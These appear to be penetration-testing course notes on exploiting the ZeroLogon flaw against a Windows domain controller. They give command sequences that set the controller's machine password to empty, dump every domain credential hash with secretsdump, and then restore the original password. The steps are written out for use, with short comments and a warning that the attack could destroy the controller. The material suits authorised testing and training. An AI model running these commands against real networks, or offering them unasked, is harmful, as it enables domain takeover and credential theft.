Abusing ZeroLogon
Attacking DC and setting pass to null and taking over DC CAREFUL COULD DESTROY DC
Check priorly if the target is vulnerable Note: Useful for a pentest to mention to the customer that they are vulnerable without actually doing the exploitation
Changing the password to empty string:
python3 exploit.py HYDRA-DC
Check if it worked:
secretsdump.py -just-dc DOMAIN/DOMAIN-CONTROLLER\$@IP-OF-DC
Example:secretsdump.py -just-dc MARVEL/HYDRA-DC\$@
If we were able to dump hashes without typing password it means we owned the DC.
Restore the machine
Use the admin hash to get the plain_password_hex
secretsdump.py administrator@ -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Restore the password
python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip -hexpass <Put here the hexpass you just got>
The console should printChange password OK
There is also another way to exploit zerologon without resetting the DC password, check out Dirk-Jan Mollema's article about this
Zerologon - Resources
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